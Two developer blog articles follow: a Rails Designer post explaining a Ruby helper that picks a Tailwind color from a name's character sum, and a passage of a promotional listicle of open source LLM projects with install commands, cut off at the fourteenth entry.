This article was originally published on Rails Designer. In the latest version (v1) of Rails...
0
2024-07-15T08:00:00
https://railsdesigner.com/uby-string-to-colors/
ruby, rails, webdev
This article was originally published on [Rails Designer](https://railsdesigner.com/uby-string-to-colors/).

---

In the [latest version (v1) of Rails Designer](https://railsdesigner.com/) I added a [Chat Messages Component](https://railsdesigner.com/components/chats/). For one of the provided variants I wanted to have a [different background and text color based on the user's name](https://railsdesigner.com/components/chats/#group-chat).

I like this kind of “random” customization to UI components, as it gives an otherwise monotone UI layout some sparkle. In the context of chat messages it also works well to differentiate between the messages from different users.

I used a similar technique for the [AvatarComponent](https://railsdesigner.com/components/avatars/). Here, when no profile picture is available (`attached`), it calculates the color for the user name's initial.

I typically calculate these colors at runtime, but I can imagine, when your app grows, storing them alongside the user in some sort of [preferences model](https://railsdesigner.com/simple-preferences/).

> [Rails Designer](https://railsdesigner.com/) is a professionally designed UI components library for Rails. Built with ViewComponent. Designed with Tailwind CSS. Enhanced with Hotwire. Build beautiful, faster.

For the chat messages example I wanted to pick one of [Tailwind CSS' colors](https://tailwindcss.com/docs/customizing-colors). This is because the background and text colors are set as follows:

```ruby
# …
def initialize(name:)
  @name = name
  @color = string_to_color(name)
end

def chat_css = class_names("px-3 py-1 rounded", states[@color.to_sym])

def states
  {
    red: "bg-red-100 text-red-800",
    blue: "bg-blue-100 text-blue-800"
    # …
  }
end
```

(example simplified for demonstration purposes; note the `to_sym`, because `string_to_color` returns a String while `states` uses Symbol keys)

So how does the `string_to_color` helper look? It's pretty straightforward. Let's see:

```ruby
# app/helpers/string_to_color_helper.rb
module StringToColorHelper
  def string_to_color(string, colors: TAILWIND_COLORS)
    hash_value = string.downcase.each_char.sum(&:ord)
    index = hash_value % colors.length

    colors[index]
  end

  private

  TAILWIND_COLORS = %w[
    slate gray zinc neutral stone red
    orange amber yellow lime green emerald
    teal cyan sky blue indigo violet
    purple fuchsia pink rose
  ].freeze
end
```

It calculates a hash value (`hash_value`) from the given string by converting each character to its ASCII value. So, given the string `Example`, this will output:

```ruby
"Example".downcase.each_char
# ['e', 'x', 'a', 'm', 'p', 'l', 'e']
```

Then, based on the ASCII characters, the sum is returned.

```ruby
"Example".downcase.each_char.sum(&:ord)
# `&:ord` → [101, 120, 97, 109, 112, 108, 101]
# `sum()` → 748
```

This sum is then used to select an index from the `colors` array. Taking the modulus of the `hash_value` with the length of the colors array (`hash_value % colors.length`) ensures the index is always within the bounds of the array.

By default this uses the `TAILWIND_COLORS` constant, thus always returning `slate`, `gray`, `red`, etc. But you can also pass another array with hexadecimal colors (directly) to the method. Like this: `string_to_color("Example", colors: ["#3498DB", "#2ECC71", "#F1C40F"])`.

V1 of Rails Designer comes with this new helper out of the box. [Check out the docs for more details](https://railsdesigner.com/docs/view-helpers/#string-to-color).
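Putting the pieces together: the helper is fully deterministic, so the same name always yields the same color. A quick worked example, following the 748 sum calculated above:

```ruby
# 748 % 22 == 0, so "Example" maps to the first of the 22 default Tailwind colors
string_to_color("Example") # => "slate"

# 748 % 3 == 1, so index 1 of a custom three-color palette is picked
string_to_color("Example", colors: ["#3498DB", "#2ECC71", "#F1C40F"]) # => "#2ECC71"
```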
railsdesigner
1,916,142
21 Open Source LLM Projects to Become 10x AI Developer
The time of AI is high especially because of powerful LLMs like GPT-4o and Claude. Today, I'm...
0
2024-07-17T09:00:56
https://blog.latitude.so/21-open-source-llm-projects/
programming, opensource, ai, webdev
AI is having its moment, especially because of powerful LLMs like GPT-4o and Claude. Today, I'm covering 21 open source LLM projects that can help you build something exciting and integrate AI into your project.

As a developer, I can confidently say that AI is not as scary as others make it sound, and those who don't learn will get left behind.

Let's cover it all.

![gif](https://media4.giphy.com/media/v1.Y2lkPTc5MGI3NjExZ21oZnA1ZDlzaHVsMHdrOHFvYzJvdHlucnhiZjA2dmU0d21idmFrbiZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/dJHaTbNQOjYMWdHSTG/giphy.webp)

---

By the way, I'm part of Latitude and we're building an open source LLM development platform. You can join the waitlist at [ai.latitude.so](https://ai.latitude.so/).

You would be able to do a lot of cool stuff like:

⚡ Deploy prompts as API endpoints.

⚡ Automated evaluations using LLMs.

⚡ Collaborate on prompt engineering.

I'm very confident that you will love it after its release!

{% cta https://ai.latitude.so/ %} Join Waitlist ⭐️ {% endcta %}

![llm platform by latitude](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/d1xuu1yhksyd2yy4dnsx.png)

---

## 1. [Vanna](https://github.com/vanna-ai/vanna) - Chat with your SQL database.

![vanna](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/uxryt1lsw41hwt31bqti.png)

&nbsp;

Vanna is an MIT-licensed open-source Python RAG (Retrieval-Augmented Generation) framework for SQL generation. Basically, it's a Python package that uses retrieval augmentation to help you generate accurate SQL queries for your database using LLMs. It's perfect for developers like me who are not very fond of SQL queries!

![low level diagram on how vanna works](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sinq74k898iyfvsnjimx.png)

Vanna works in two easy steps: train a `RAG model` on your data, and then ask questions that will return SQL queries, which can be set up to run on your database automatically.

![how vanna works](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5fjc5966fphrge71s8sg.png)

You don't need to know how all of this works under the hood to use it. You just have to `train` a model, which stores some metadata, and then use it to `ask` questions.

Get started with the following command.

```bash
pip install vanna
```

To make things a little easier, they have built user interfaces that you can use as a starting point for your own custom interface. Find all the [interfaces](https://github.com/vanna-ai/vanna?tab=readme-ov-file#user-interfaces) including Jupyter Notebook and Flask.

![variations](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/20nymucrkb9wlsvi4kpd.png)

You can read the [docs](https://vanna.ai/docs/) and you can try this [Colab notebook](https://vanna.ai/docs/app/) in case you want to see how it works after training.

![flask UI gif](https://vanna.ai/blog/img/vanna-flask.gif)

Watch this [demo](https://github.com/vanna-ai/vanna?tab=readme-ov-file#vanna) for a complete walkthrough!

![vanna demo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/40gg9oeb4piys15p2re2.gif)

They have 9.5k+ stars on GitHub and are built using Python.

{% cta https://github.com/vanna-ai/vanna %} Star Vanna ⭐️ {% endcta %}

---

## 2. [Khoj](https://github.com/khoj-ai/khoj) - Your AI second brain.

![khoj](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/31d9m3po4oppf4ignvbh.png)

&nbsp;

Khoj is the open source AI copilot for search. Easily get answers without having to sift through online results or your own notes.
For me, the concept seems exciting, and it can help me research a lot of projects.

Khoj can understand your Word, PDF, org-mode, markdown, and plaintext files, GitHub projects, and even Notion pages.

![type of documents](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5ory8aio202w6ce5x6ul.png)

It's available as a Desktop app, Emacs package, Obsidian plugin, Web app, and WhatsApp AI. Obsidian with Khoj might be the most powerful combo!

You can get started with Khoj locally in a few minutes with the following commands.

```
$ pip install khoj-assistant
$ khoj
```

Watch it in action!

![khoj walkthrough gif](https://media0.giphy.com/media/v1.Y2lkPTc5MGI3NjExN3RzNHA0MWE2NnB5aTMxOXlnY3puMDhkaHpwa2ZrYWlzMWJ0ZXRnNyZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/0VIZl3xIVyzzfS9hiJ/giphy.gif)

Some of the exciting features:

✅ You can share your notes and documents to extend your digital brain.

✅ Your AI agents have access to the internet, allowing you to incorporate real-time information.

✅ You'll get fast, accurate semantic search on top of your docs.

✅ Your agents can create deeply personal images and understand your speech. For instance, saying: "Create a picture of my dream house, based on my interests". It will draw this!

![image generation](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s1f6gtwssn08mhk6s6ud.png)

Read all the [features](https://docs.khoj.dev/category/features) including shareable chat, online chat, file summarization, and complete details in various categories.

You can read the [docs](https://docs.khoj.dev/#/) and you can try [Khoj Cloud](https://app.khoj.dev/) to try it quickly.

Watch the complete walkthrough on YouTube!

{% embed https://www.youtube.com/watch?v=Lnx2K4TOnC4&pp=ygUYa2hvaiBvcGVuIHNvdXJjZSBwcm9qZWN0 %}

It has 12k stars on GitHub and is backed by Y Combinator.

{% cta https://github.com/khoj-ai/khoj %} Star Khoj ⭐️ {% endcta %}

---

## 3. [Flowise](https://github.com/FlowiseAI/Flowise) - Drag & drop UI to build your customized LLM flow.

![flowiseai](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/r5bp43nil764fhe4a05z.png)

&nbsp;

Flowise is an open source visual UI tool to build your customized LLM orchestration flows & AI agents. We shouldn't compare projects, but I can confidently say this might be the most useful one among the projects listed here!

![flowise gif](https://github.com/FlowiseAI/Flowise/raw/main/images/flowise.gif)

Get started with the following npm command.

```npm
npm install -g flowise
npx flowise start
OR
npx flowise start --FLOWISE_USERNAME=user --FLOWISE_PASSWORD=1234
```

This is how you integrate the API.

```python
import requests

url = "/api/v1/prediction/:id"

def query(payload):
    response = requests.post(
        url,
        json = payload
    )
    return response.json()

output = query({
    "question": "hello!"
})
```

![integrations](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ahk2ovjrpq1qk3r5pfot.png)

You can read the [docs](https://docs.flowiseai.com/). A cloud-hosted version is not available, so you would have to self-host using these [instructions](https://github.com/FlowiseAI/Flowise?tab=readme-ov-file#-self-host).

Let's explore some of the use cases:

⚡ Let's say you have a website (could be a store, an e-commerce site, or a blog), and you want to scrape all the relative links of that website and have an LLM answer any question about your website. You can follow this [step-by-step tutorial](https://docs.flowiseai.com/use-cases/web-scrape-qna) on how to achieve that.
![scraper](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/e91sz2mga5wvc0x2hp2g.png)

⚡ You can also create a custom tool that will be able to call a webhook endpoint and pass the necessary parameters into the webhook body. Follow this [guide](https://docs.flowiseai.com/use-cases/webhook-tool), which uses Make.com to create the webhook workflow.

![webhook](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ckyivo9dvue461jc9pv4.png)

There are a lot of other use cases, such as building a SQL QnA or interacting with APIs. Explore and build cool stuff!

FlowiseAI has 27.5k stars on GitHub and more than 14k forks, so it has a good overall ratio.

{% cta https://github.com/FlowiseAI/Flowise %} Star Flowise ⭐️ {% endcta %}

---

## 4. [LLAMA GPT](https://github.com/getumbrel/llama-gpt) - a self-hosted, offline, ChatGPT like chatbot (Powered by Llama 2).

![llama gpt](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m5qoizptgncd0u1wlvqc.png)

&nbsp;

LlamaGPT is a self-hosted, offline, ChatGPT-like chatbot, powered by Llama 2. It's 100% private, and your data doesn't leave your device. In recent versions, they have also added support for Code Llama models and Nvidia GPUs.

You can install it from the [Umbrel App Store](https://apps.umbrel.com/app/llama-gpt) or you can also [install it with Kubernetes](https://github.com/getumbrel/llama-gpt?tab=readme-ov-file#install-llamagpt-with-kubernetes).

You can read about the [supported models](https://github.com/getumbrel/llama-gpt?tab=readme-ov-file#supported-models) in the docs. It's very simple to use!

![llama gpt video](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8e0x0vkbt3jifov3vb3j.gif)

I know, at this point it feels confusing that there are so many ways to run LLMs locally. As a developer, I think it's important to evaluate which method works for our situation!

They have 10k+ stars on GitHub and offer 2 packages.

{% cta https://github.com/getumbrel/llama-gpt %} Star LLAMA GPT ⭐️ {% endcta %}

---

## 5. [LocalAI](https://github.com/mudler/LocalAI) - free OpenAI alternative.

![localAI](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ln76pv7ffcsq11c7wx45.png)

&nbsp;

LocalAI is free, open source, and considered an alternative to OpenAI. LocalAI acts as a drop-in replacement REST API that’s compatible with OpenAI (Elevenlabs, Anthropic... ) API specifications for local AI inferencing. It allows you to run LLMs locally or on-prem with consumer-grade hardware, supporting multiple model families.

The best part is that it does not require a GPU. I never thought there would be such an option, so it's a goldmine for devs who don't want to pay much. Plus, it can generate text, audio, video, and images, and also has voice-cloning capabilities. What more do you need?

You can watch the complete walkthrough by Semaphore CI!

{% embed https://www.youtube.com/watch?v=Xh57mMlfuMk %}

There are a lot of [integration options](https://localai.io/docs/integrations/), and developers have built awesome stuff such as an [Extension for attaching a LocalAI instance to VSCode](https://github.com/badgooooor/localai-vscode-plugin).

You can read the [quickstart guide](https://localai.io/basics/getting_started/) and how to [run it with Kubernetes](https://localai.io/basics/kubernetes/). Find all the [resources](https://github.com/mudler/LocalAI?tab=readme-ov-file#book--media-blogs-social) including how to run it on AWS, k8sgpt, and more.
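Because LocalAI exposes an OpenAI-compatible API, existing OpenAI client code can simply be pointed at it. Here is a minimal sketch, assuming a LocalAI server running on `localhost:8080` (its default port) with a model configured under the hypothetical name `gpt-4`:

```python
# a minimal sketch: the official OpenAI Python client pointed at a local LocalAI server
from openai import OpenAI

# LocalAI does not require a real API key, so any placeholder string works
client = OpenAI(base_url="http://localhost:8080/v1", api_key="not-needed")

response = client.chat.completions.create(
    model="gpt-4",  # hypothetical model name configured in LocalAI
    messages=[{"role": "user", "content": "Hello from LocalAI!"}],
)
print(response.choices[0].message.content)
```

This is the main appeal of the "drop-in replacement" design: switching an app between OpenAI and LocalAI is just a matter of changing the base URL.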
They have 21k+ stars on GitHub and are on the `v2.18` release.

{% cta https://github.com/mudler/LocalAI %} Star LocalAI ⭐️ {% endcta %}

---

## 6. [Continue](https://github.com/continuedev/continue) - enable you to create an AI software development system.

![continue](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7ro5ctus5tdfvqdnysby.png)

&nbsp;

Continue is one of the best AI code assistants I've seen in my developer journey. You can connect any models and any context to build custom autocomplete and chat experiences inside [VS Code](https://marketplace.visualstudio.com/items?itemName=Continue.continue) and [JetBrains](https://plugins.jetbrains.com/plugin/22707-continue-extension).

You can easily set it up. Below are some snapshots from when I installed it.

![step 1](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rq5ld2djixiv5pmz8zzx.png)
<figcaption>Step 1</figcaption>

&nbsp;

![step 2](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/j9u0lan7koa5sjtysykw.png)
<figcaption>run it through terminal</figcaption>

&nbsp;

![step2 complete](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/duhhgmg2eqr1tk1r2ecy.png)
<figcaption>step2 complete</figcaption>

&nbsp;

![step3](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wzufhvtre8o97wq3zqlr.png)
<figcaption>run it through terminal</figcaption>

&nbsp;

![step3 complete](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nd4lu8r0shiah1v7odq0.png)
<figcaption>step3 complete</figcaption>

&nbsp;

After you've configured it, you're all set. They have a lot of awesome features such as:

> Tab to autocomplete code suggestions.

![autocomplete](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/09xt6urla4jic5x3m5rr.gif)

> Ask questions about your codebase.

![questions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qd95frn0j9cd417yighz.gif)

> Understand terminal errors immediately.

![errors](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kaaq6x5978tm1u61moxb.gif)

> Kick off actions with slash commands.

![commands](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/j4vlzc2vuiuoivgqy5e7.png)

> Refactor functions where you are coding.

![refactor](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7wz1tzon8afivi79ulvn.png)

Read about all the [features](https://docs.continue.dev/how-to-use-continue). You will have to install the [VSCode extension](https://marketplace.visualstudio.com/items?itemName=Continue.continue) from the marketplace and then read the [quickstart guide](https://docs.continue.dev/quickstart).

You can read the [docs](https://docs.continue.dev/intro). You can also watch this basic demo on YouTube!

{% embed https://www.youtube.com/watch?v=V3Yq6w9QaxI&t=29s&pp=ygUaY29udGludWUgYWkgY29kZSBhc3Npc3RhbnQ%3D %}

They have 13k+ stars on GitHub and are built using TypeScript.

{% cta https://github.com/continuedev/continue %} Star Continue ⭐️ {% endcta %}

---

## 7. [Chat2DB](https://github.com/chat2db/Chat2DB) - AI-driven data management platform.

![chat2db](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0fu2hozmkm3ps8l99rj9.png)

&nbsp;

Chat2DB is an AI-first data management, development, and analysis tool. Its core is AIGC (Artificial Intelligence Generated Code), which can convert natural language into SQL, SQL into natural language, and automatically generate reports, taking efficiency to another level. Even operators who do not understand SQL can use it to quickly query business data and generate reports.
When you do any operation, it will give you suggestions. For instance, when you are doing database development, it will help you generate SQL directly from natural language, give you SQL optimization suggestions, help you analyze SQL performance and execution plans, and can also help you quickly generate SQL test data, system code, etc. It's actually very powerful :)

They have excellent support for multiple data sources and can easily integrate 17 different database types, including PostgreSQL, MySQL, MongoDB, and Redis.

![databases](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/c5k3ryojynrovdlx508i.png)

You can download it or [try it in the browser](https://app.chat2db.ai/).

Let's see some of the exciting features:

✅ Intelligent reports.

![reports](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/g4580tabu3t3vq48e0k5.png)

✅ Data Exploration.

![data exploration](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mqq58sgw239ugep7ocez.png)

✅ SQL Development.

![SQL Development](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7fpvwv5lpiyqil2t6aig.png)

&nbsp;

![sql development](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/j6zszr0onru157uuvhpw.png)

You can read the [quickstart guide](https://docs.chat2db.ai/docs/start-guide/getting-started) in the official docs.

They have 14k+ stars on GitHub and are on release `v3.2`.

{% cta https://github.com/chat2db/Chat2DB %} Star Chat2DB ⭐️ {% endcta %}

---

## 8. [LibreChat](https://github.com/danny-avila/LibreChat?tab=readme-ov-file) - Enhanced ChatGPT Clone.

![libre chat](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/khdouc1ssvs8g3wwfets.png)

&nbsp;

LibreChat is a free, open source AI chat platform. This Web UI offers vast customization, supporting numerous AI providers, services, and integrations. It serves all AI conversations in one place with a familiar interface and innovative additions, for as many users as you need.

Some of the features are:

✅ Upload and analyze images seamlessly with advanced models like Claude 3, GPT-4, Gemini Vision, Llava, and Assistants.

✅ Chat with files using various powerful endpoints from OpenAI, Azure, Anthropic, and Google.

✅ Multilingual UI with support for 20+ languages.

✅ [Diverse model options](https://www.librechat.ai/docs/features#diverse-model-options) including OpenAI, BingAI, Anthropic (Claude), Azure OpenAI, and Google’s premier machine learning offerings.

![ai model image](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3lwh3xae7ax2yejsqwxp.png)

You can read the [quickstart guide](https://www.librechat.ai/docs/quick_start) to get started.

Watch this video for the complete walkthrough!

{% embed https://www.youtube.com/watch?v=bSVHEbVPNl4 %}

They have 15k+ stars on GitHub and offer 4 packages.

{% cta https://github.com/danny-avila/LibreChat?tab=readme-ov-file %} Star LibreChat ⭐️ {% endcta %}

---

## 9. [Lobe Chat](https://github.com/lobehub/lobe-chat) - modern-design LLMs/AI chat framework.

![lobe chat](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ddxibf7xxx931tdoj1mn.png)

&nbsp;

An open-source, modern-design ChatGPT/LLM UI and framework. It supports speech synthesis, multi-modal interactions, and an extensible (function call) plugin system, and you can deploy your private ChatGPT-like app with one click.

![journey](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/39se198xal53r854sdps.png)

Let's see some of the exciting features of LobeChat:

✅ Multi-Model Service Provider Support.
![multi service](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nodazgxel962wrp2hnvo.png)

They have expanded their support to multiple model service providers, rather than being limited to a single one. Find the complete list of [10+ model service providers](https://lobehub.com/docs/usage/features/multi-ai-providers) that they support.

✅ Assistant Market.

![Assistant Market](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/35z3kz2jr4mnxid9dwsg.png)

In LobeChat's [Assistant Market](https://lobehub.com/assistants), creators can discover an innovative community that brings together numerous carefully designed assistants.

![market](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ex23f2epblfp2cxtxbnl.png)

There are so many awesome applications there. WOW!

✅ Model Vision Recognition.

![Model Vision Recognition](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fuxz350091223cj36dq7.png)

LobeChat now supports large language models with visual recognition capabilities such as OpenAI's gpt-4-vision, Google Gemini Pro Vision, and Zhipu GLM-4 Vision, giving LobeChat multimodal interaction capabilities. Users can easily upload or drag and drop images into the chat box, and the assistant will be able to recognize the content of the images and engage in intelligent conversations.

✅ Text to Image Generation.

![Text to Image Generation](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/z2q6qzcy8anjgsg2381o.png)

You can directly use the text-to-image tool during conversations with the assistant. By using the power of AI tools such as DALL-E 3, MidJourney, and Pollinations, assistants can now generate images right inside a conversation.

✅ Local Large Language Model (LLM) Support.

![Local Large Language Model (LLM) Support.](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ucn4rpa4p2vb11hhvkn1.png)

With the powerful infrastructure of Ollama AI and the community's collaborative efforts, you can now engage in conversations with a local LLM (Large Language Model) in LobeChat! By running the following Docker command, you can experience conversations with a local LLM in LobeChat.

```bash
docker run -d -p 3210:3210 -e OLLAMA_PROXY_URL=http://host.docker.internal:11434/v1 lobehub/lobe-chat
```

✅ Progressive Web App (PWA).

![Progressive Web App (PWA)](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sccmha74iz01rr12gphr.png)

They have adopted Progressive Web App (PWA) technology, a modern web technology that elevates web applications to a near-native app experience.

✅ Custom Themes.

![custom themes](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7cl73pplbor4z1381kdm.png)

&nbsp;

Read about all of the [features and use cases](https://lobehub.com/docs/usage/start). You can self-host it or deploy it using Docker.

The Lobe Chat [ecosystem](https://github.com/lobehub/lobe-chat/tree/main?tab=readme-ov-file#-ecosystem) provides four packages: `lobehub/ui`, `lobehub/icons`, `lobehub/tts`, and `lobehub/lint`.

They also provide a [plugin market](https://lobehub.com/plugins) where you can find lots of useful plugins that can be used to introduce new function calls and even new ways to render message results. If you want to develop your own plugin, refer to the [📘 Plugin Development Guide](https://lobehub.com/docs/usage/plugins/development) in the wiki.

![plugins market](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/uqtxt31vc42uwnw2ukgr.png)

You can read the [docs](https://lobehub.com/docs/usage/start).
You can check the [live demo](https://chat-preview.lobehub.com/chat). It's pretty cool!

![demo snapshot](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xe3ngshtwpps2kmpu98f.png)

They have 35k+ stars on GitHub with more than 500 releases.

{% cta https://github.com/lobehub/lobe-chat %} Star Lobe Chat ⭐️ {% endcta %}

---

## 10. [MindsDB](https://github.com/mindsdb/mindsdb) - The platform for customizing AI from enterprise data.

![MindsDB](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i9q3jdswxdx6wqfk0vqw.png)

&nbsp;

MindsDB is the platform for customizing AI from enterprise data. With MindsDB, you can deploy, serve, and fine-tune models in real-time, utilizing data from databases, vector stores, or applications, to build AI-powered apps - using universal tools developers already know.

![mindsdb](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/d7ggww5ner38r4r9qc06.png)

With MindsDB and its nearly [200 integrations](https://docs.mindsdb.com/integrations/data-overview) to data sources and AI/ML frameworks, any developer can use their enterprise data to customize AI for their purpose, faster and more securely.

![how MindsDB works](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4q1gfmhq43gopdix03gr.png)

You can read the [docs](https://docs.mindsdb.com/) and the [quickstart guide](https://docs.mindsdb.com/quickstart-tutorial) to get started.

They currently support a total of [3 SDKs](https://docs.mindsdb.com/sdks/overview): Mongo-QL, Python, and JavaScript.

There are several applications of MindsDB, such as integrating with numerous data sources and AI frameworks so you can easily bring data and AI together to create and automate custom workflows. Other common use cases include fine-tuning models, chatbots, alert systems, content generation, natural language processing, classification, regression, and forecasting. Read more about the [use cases](https://docs.mindsdb.com/use-cases/); each of them has an architecture diagram with a little info.

![use cases](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wuhxzbioqh9a5s9f0w7s.png)

For instance, the image above shows the chatbot architecture diagram with MindsDB. You can read about all the [solutions](https://github.com/mindsdb/mindsdb?tab=readme-ov-file#-get-started) provided, along with their SQL query examples.

```
// SQL Query Example for Chatbot
CREATE CHATBOT slack_bot USING database='slack',agent='customer_support';
```

![chatbot](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/otoqsro02ghqb709yglk.png)

Just to show you the overall possibilities, you can check out [How to Forecast Air Temperatures with AI + IoT Sensor Data](https://mindsdb.com/blog/how-to-forecast-air-temperatures-with-ai-iot-sensor-data). Exciting, right :)

![mindsdb](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/82wrjyrkch44taeurv1r.png)

They have 25.4k+ stars on GitHub and are on `v24.7.2.0` with more than 200 releases. By the way, this is the first time I've seen 4 parts in a release version, as I've always followed semantic releases.

{% cta https://github.com/mindsdb/mindsdb %} Star MindsDB ⭐️ {% endcta %}

---

## 11. [AutoGPT](https://github.com/Significant-Gravitas/AutoGPT) - more exciting than ChatGPT.

![auto gpt](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3hjamyxzkhy7luwsi9vp.png)

&nbsp;

At the core of AutoGPT lies its primary project, a semi-autonomous agent driven by large language models (LLMs), designed to perform any task for you.
The AutoGPT project consists of [four main components](https://docs.agpt.co/#agent):

- The Agent – also known as just "AutoGPT"
- The Benchmark – AKA agbenchmark
- The Forge
- The Frontend

Read how you can [set up AutoGPT](https://docs.agpt.co/autogpt/setup/) using an OpenAI key.

You can watch this [YouTube video by Fireship](https://www.youtube.com/watch?v=_rGXIXyNqpk) to learn what AutoGPT is.

{% embed https://www.youtube.com/watch?v=_rGXIXyNqpk %}

You can also watch this [AutoGPT tutorial](https://www.youtube.com/watch?v=FeIIaJUN-4A) by Sentral Media.

You can read the [docs](https://docs.agpt.co/) and check out the [project board](https://github.com/orgs/Significant-Gravitas/projects/1) to see what's under development right now.

Even if you don't know much about AI, you can try AutoGPT to understand how you can save time and build cool stuff.

They have 164k+ stars on GitHub, thanks to such an excellent use case and automation capabilities.

{% cta https://github.com/Significant-Gravitas/AutoGPT %} Star AutoGPT ⭐️ {% endcta %}

---

## 12. [reor](https://github.com/reorproject/reor) - self organizing AI note-taking app.

![reor](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/c0x2q2a67bg7gzdekizw.png)

&nbsp;

One of the most exciting projects I've seen so far, especially because it runs models locally. Reor is an AI-powered desktop note-taking app: it automatically links related notes, answers questions about your notes, and provides semantic search. Everything is stored locally, and you can edit your notes with an Obsidian-like markdown editor.

The project hypothesizes that AI tools for thought should run models locally by default. Reor stands on the shoulders of the giants `Ollama`, `Transformers.js` & `LanceDB` to enable both LLMs and embedding models to run locally. Connecting to OpenAI or OpenAI-compatible APIs like Oobabooga is also supported.

> I know you're wondering: how can it possibly be `self-organizing`?

a. Every note you write is chunked and embedded into an internal vector database.
b. Related notes are connected automatically via vector similarity.
c. LLM-powered Q&A does RAG on the corpus of notes.
d. Everything can be searched semantically.

You can watch the demo here!

![demo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/k1whpg9m7ubt5xluyf7f.gif)

One way to think about Reor is as a RAG app with two generators: the LLM and the human. In Q&A mode, the LLM is fed retrieved context from the corpus to help answer a query. Similarly, in editor mode, we can toggle the sidebar to reveal related notes `retrieved` from the corpus. This is quite a powerful way of `augmenting` your thoughts by cross-referencing ideas in a current note against related ideas from your digital collection.

You can read the [docs](https://www.reorproject.org/docs) and [download](https://www.reorproject.org/) it from the website. Mac, Linux & Windows are all supported.

They have also provided starter guides to help you get started.

![get started guides](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bx3w7nalcwc9egumu0hm.png)

You can also watch this walkthrough!

{% embed https://www.youtube.com/watch?v=2XFYyrQz9xQ&pp=ygUYcmVvciBvcGVuIHNvdXJjZSBwcm9qZWN0 %}

They have 6.5k stars on GitHub and are built using TypeScript.

{% cta https://github.com/reorproject/reor %} Star reor ⭐️ {% endcta %}

---

## 13. [Leon](https://github.com/leon-ai/leon) - your open source personal assistant.
![leon](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mnv85osce6ps9xodf07t.png)

&nbsp;

Leon is an open source personal assistant who can live on your server. You're definitely curious, right? 😅

He does stuff when you ask him to. You can even talk to him, and he will reply by talking back to you. Similarly, you can also text him!

If you are a developer (or not), you may want to build many things that could help in your daily life. Instead of building a dedicated project for each of those ideas, Leon can help you with his `Skills` structure.

![leon gif](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ygd52jmxnyz5ctjfoyto.gif)

If you want, Leon can stay offline to protect your privacy. This is the list of [skills](https://github.com/leon-ai/leon/tree/develop/skills) Leon supports for now.

You should read the [story behind Leon](https://blog.getleon.ai/the-story-behind-leon/). You can also watch this demo to learn more about Leon.

{% embed https://www.youtube.com/watch?v=p7GRGiicO1c %}

![features](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/70mddmgadcbfwzugd1bl.png)

This is the high-level architecture schema of Leon.

![architecture](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/a6b9vgj3fagera0bsyur.png)

You can install Leon using these commands.

```
# install the leon global CLI
npm install --global @leon-ai/cli

# install leon
leon create birth
```

You can read the [docs](https://docs.getleon.ai/). Appwrite is one of the sponsors, which says a lot about its overall impact.

It has 15k stars on GitHub and has shipped some drastic changes recently, so make sure to read the docs with extra care.

{% cta https://github.com/leon-ai/leon %} Star Leon ⭐️ {% endcta %}

---

## 14. [Instrukt](https://github.com/blob42/Instrukt) - Integrated AI in the terminal.

![instrukt](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wsk64pf5yuosui91tmz9.png)

&nbsp;

Instrukt is a terminal-based AI-integrated environment. It offers a platform where users can:

- Create and instruct modular AI agents.
